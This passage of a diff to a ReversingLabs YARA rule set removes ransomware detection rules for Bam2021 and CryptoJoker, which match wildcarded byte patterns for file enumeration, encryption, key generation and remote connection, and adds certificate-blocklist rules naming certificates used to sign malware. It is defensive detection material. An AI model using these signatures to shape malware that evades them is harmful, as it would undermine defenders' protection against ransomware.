-            ?? 48 8D 35 ?? ?? ?? ?? 4C 8D 35 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 4C 8B C3 48 8B 95
-            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 4D 8B C4
-            48 8D 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48
-            85 D2 74 ?? 48 8B FA 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B CA E8 ?? ?? ?? ?? 90 4D 85 ED
-            74 ?? 49 8B FD 33 C0 B9 ?? ?? ?? ?? F3 AA 49 8B CD E8 ?? ?? ?? ?? 90 48 89 74 24 ??
-            4C 89 74 24
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $find_files ) and ( all of ( $find_system_volumes_v1_p* ) ) and ( all of ( $set_default_icon_p* ) ) and ( $cmd_prompt ) and ( $exclude_from_encryption ) and ( $encrypt_files_v1 ) ) or ( ( $find_files ) and ( $cmd_prompt ) and ( $find_system_volumes_v2 ) and ( $drop_ransom_note ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DON'T MISS A WORD LIMITED" and pe.signatures [ i ] . serial == "2d:aa:8d:62:9c:c0:41:0a:94:82:e6:2a:0f:8b:f8:fc" and 1543449600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bam2021 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_9A727E200Ea76570 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Bam2021 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "31ae99e3-223c-51fb-97c1-353ff063057f"
-		date = "2021-09-17"
-		modified = "2021-09-17"
+		id = "d133dac3-3959-50f0-913e-b279ca6a1c2c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Bam2021.yara#L1-L167"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5b717510991b78f07806e88f3dfe1c27d6ec1ec21af61a7c4f1edf7c915785d5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12984-L13002"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "337dc486f2bdca1f7682887d5e5c0f82961850a8fd9c9a20b9a43a75334070d8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Bam2021"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares = {
-            83 EC ?? 53 55 8B 2D ?? ?? ?? ?? 56 57 68 ?? ?? ?? ?? FF D5 8B 74 24 ?? 6A ?? 56 C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24
-            ?? 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 89 06 33 C0 5F 5E
-            5D 5B 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85
-            FF 75 ?? 89 06 8B 44 24 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8D 4C 24
-            ?? 51 57 8D 54 24 ?? 52 50 E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ?? ?? ?? 33 DB 39 5C
-            24 ?? 76 ?? 8D 77 ?? 90 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44
-            24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 06 50 C7 44 24 ?? ?? ?? ?? ?? 89 44 24
-            ?? FF D5 6A ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 3E E8 ?? ??
-            ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 46 ?? 83 E0 ?? 3C ??
-            75 ?? 8B 4C 24 ?? 8B 44 24 ?? 51 8D 56 ?? 52 50 E8 ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24
-            ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 74 ?? 56 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 31 57 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 52 E8 ?? ?? ??
-            ?? 8B F0 85 F6 74 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 30 33
-            C0 5F 5E 5D 5B 83 C4 ?? C2
-        }
-		$find_files_p1 = {
-            8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8
-            ?? 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 3B D5 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C5 0F 84 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 3B D5 74
-            ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D5 75 ?? 33 C0 EB ?? 1B C0
-            83 D8 ?? 3B C5 0F 84 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8C 24
-            ?? ?? ?? ?? 51 BB ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 9C 24 ?? ??
-            ?? ?? 8D 74 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 55 8D 8C 24
-            ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? 8B 54 24 ??
-            52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 84 24 ?? ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 66 89 44 24 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? ??
-            83 C4 ?? 8B 54 24 ?? 8B 44 24 ?? 42 3B C2 77 ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 34 0A 3B C6 77 ?? 2B F0 8B 44 24 ?? 39 2C B0 75 ?? 6A
-            ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 04 B1 8B 54 24 ?? 8B 0C B2 89 4C 24 ?? 89
-        }
-		$find_files_p2 = {
-            4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? 3B CD 74 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 89 69 ?? 6A
-            ?? 66 89 41 ?? 55 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF 44
-            24 ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 73 ?? 8D 84 24 ??
-            ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 47 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 16 52 8D 84 24 ??
-            ?? ?? ?? 50 FF D3 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? E9 ?? ?? ?? ?? 57 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C0 ?? 8D 94 24 ?? ?? ?? ?? 2B D0 0F
-            B7 08 66 89 0C 02 83 C0 ?? 66 3B CD 75 ?? 33 C0 EB ?? 8D A4 24 ?? ?? ?? ?? 8D 49 ??
-            0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 33 C0 8D 9B
-            ?? ?? ?? ?? 0F B7 88 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83 C0 ?? 66 3B CD 75 ?? 8B
-            5C 24 ?? 6A ?? B9 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8D 8C
-            24 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
-            ?? ?? 64 A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 DB 3B C3 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0
-            83 C4 ?? 3B F3 74 ?? 68 ?? ?? ?? ?? 8D 46 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6
-            EB ?? 33 C0 A3 ?? ?? ?? ?? 8D 4C 24 ?? 51 8B F8 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
-            24 ?? ?? ?? ?? 33 D2 53 89 9C 24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 84 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 33 D2 53 50 66 89 54
-            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 47 ?? 83 C4 ?? 50 89 5C 24 ?? 89 44 24 ?? E8 ??
-            ?? ?? ?? 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B
-        }
-		$encrypt_files_p2 = {
-            F4 33 C9 8D 84 24 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 89 5E ?? 89 64 24 ?? 66 89 4E ??
-            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 94 24 ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 83 EC ?? 8B F4 33 C0 C7 46 ?? ?? ?? ?? ?? 89 5E ?? 66 89 46 ?? 8D 84 24
-            ?? ?? ?? ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B
-            C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 8C 24
-            ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? ??
-            ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ??
-            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            57 E8 ?? ?? ?? ?? 53 6A ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ??
-            ?? ?? ?? 89 5E ?? 8D 44 24 ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ??
-            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 44 24 ?? E8 ?? ?? ?? ?? 57 E8 ??
-            ?? ?? ?? 53 6A ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ??
-            ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7
-        }
-		$encrypt_files_p3 = {
-            46 ?? ?? ?? ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 90
-            66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 44 24 ?? 50 53 6A ?? 53 53 53 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? 51 FF 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B F8 53
-            57 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 54
-            24 ?? 52 57 8B CE E8 ?? ?? ?? ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 74 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ??
-            ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$generate_key = {
-            50 C7 44 24 ?? ?? ?? ?? ?? F3 A5 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ??
-            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
-            6A ?? 6A ?? 6A ?? 8D 54 24 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ??
-            ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 4C
-            24 ?? 51 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24
-            ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 44 24 ?? 50 8D 4C 24
-            ?? 51 6A ?? 52 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ??
-            ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? C1 E8 ??
-            89 44 24 ?? 03 C3 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 5F 5E 5D B8 ?? ?? ??
-            ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 53 55 56 E8 ?? ?? ?? ?? 8B
-            4C 24 ?? 83 C4 ?? 89 5C 24 ?? 83 C3 ?? 53 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? 51 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ??
-            ?? 83 C4 ?? C2 ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 57 56 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 56
-            89 38 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 5F 5E 5D 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 83
-            C4 ?? C2
-        }
-		$remote_connection = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 57 8D 44 24 ?? 50 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 46 ?? 83
-            F8 ?? 74 ?? 8B 46 ?? 8D 7E ?? 83 E8 ?? 83 78 ?? ?? 7E ?? 8B 48 ?? 51 8B CF E8 ?? ??
-            ?? ?? 8B 3F 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 54 24 ?? 52 89 44 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 8B 46 ?? 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24
-            ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 48 ?? 8B 11 8B 02 0F B7 56
-            ?? B9 ?? ?? ?? ?? 52 89 44 24 ?? 66 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 4E ?? 66 89 44
-            24 ?? 6A ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B
-            56 ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 ?? ?? ?? ?? 33 CC E8
-            ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 8C 24 ?? ?? ?? ?? 5F 33 CC B8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( all of ( $find_files_p* ) ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexsandro Da Rosa - ME" and ( pe.signatures [ i ] . serial == "00:9a:72:7e:20:0e:a7:65:70" or pe.signatures [ i ] . serial == "9a:72:7e:20:0e:a7:65:70" ) and 1539056530 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cryptojoker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0954A3C876Df9262Cde5817F9870F0C6 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoJoker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50a9280b-a352-5a2b-acee-5690e509dfd7"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "89f3a334-cd2f-51b9-83b2-2baca3c59ba5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.CryptoJoker.yara#L1-L140"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "42ee1e63ada1ae986f43a1300eda0b1fa7b54c26be31ef5637bb321defffbe40"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13004-L13020"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "164b064a9df31d4a122236dfee7b713417a44d47a7f304b2bf55686a7f038feb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoJoker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$call_encrypt = {
-            2B 02 26 16 FE 09 00 00 FE 09 01 00 FE 09 02 00 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            2B 02 26 16 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 20 00 04 ?? ?? 73 ?? ?? ?? ?? 0C 20 05 ?? ?? ??
-            16 39 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 20 04 ?? ?? ?? FE ?? ?? ?? FE ?? ??
-            ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26
-            20 03 ?? ?? ?? 16 39 ?? ?? ?? ?? 26 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
-            ?? ?? ?? 26 20 00 ?? ?? ?? 38 ?? ?? ?? ?? 00 00 08 06 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 26 20 03 ?? ?? ?? 38 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 13 04 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ??
-            26 00 08 07 17 28 ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 20 03 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 20 02 ?? ?? ?? 38 ?? ?? ?? ?? 11 04
-            13 05 DD ?? ?? ?? ?? 00 08 16 28 ?? ?? ?? ?? 00 00 DC 08 14 FE 01 13 06 11 06 3A ?? ?? ?? ?? 08 28 ?? ?? ??
-            ?? 00 DC 00 11 05 2A
-        }
-		$start_process = {
-            2B ?? 26 16 20 10 ?? ?? ?? 38 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ??
-            38 ?? ?? ?? ?? 00 11 05 17 28 ?? ?? ?? ?? 20 06 ?? ?? ?? 38 ?? ?? ?? ?? 00 28 ?? ?? ?? ??
-            0A 20 09 ?? ?? ?? 38 ?? ?? ?? ?? 00 11 05 08 28 ?? ?? ?? ?? 20 12 ?? ?? ?? 38 ?? ?? ?? ??
-            11 06 17 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38
-            ?? ?? ?? ?? 11 05 17 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 06 19 20 ?? ?? ?? ??
-            28 ?? ?? ?? ?? A2 20 0F ?? ?? ?? 38 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 13 06 20 02 ?? ?? ?? 38
-            ?? ?? ?? ?? 00 11 04 28 ?? ?? ?? ?? 26 20 13 ?? ?? ?? 38 ?? ?? ?? ?? 08 09 28 ?? ?? ?? ??
-            20 07 ?? ?? ?? 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 05 38 ?? ?? ?? ?? 26 20 0D ?? ?? ?? 38 ??
-            ?? ?? ?? 11 06 0D 38 ?? ?? ?? ?? 20 10 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20 08 ?? ?? ?? 17 3A ?? ?? ?? ??
-            26 11 06 18 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 00 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ??
-            26 06 07 28 ?? ?? ?? ?? 0C 20 0B ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 11 06 16 20 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? A2 17 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 26 20 03 ?? ?? ?? 16 39 ?? ??
-            ?? ?? 26 00 11 04 11 05 28 ?? ?? ?? ?? 20 0A ?? ?? ?? 17 3A ?? ?? ?? ?? 26 00 73 ?? ?? ??
-            ?? 13 04 20 04 ?? ?? ?? 38 ?? ?? ?? ?? 2A
-        }
-		$msgbox_timer = {
-            00 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 28 ?? ?? ?? ?? 0C
-            00 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE 12 08 14 FE 01
-            13 04 11 04 2D ?? 08 6F ?? ?? ?? ?? 00 DC 00 02 7B ?? ?? ?? ?? 16 32 0E 02 7B
-            ?? ?? ?? ?? 16 FE 04 16 FE 01 2B ?? 16 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 38 ?? ?? ?? ?? 02 7B ??
-            ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 16 FE 01 16 FE 01 2B
-            ?? 17 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ??
-            ?? 0D 09 17 6F ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F 40 28 ??
-            ?? ?? ?? 26 00 38 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 11
-            04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04
-            11 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 FE 01 13 04 11 04
-            2D ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ??
-            17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 02 7B
-            ?? ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ??
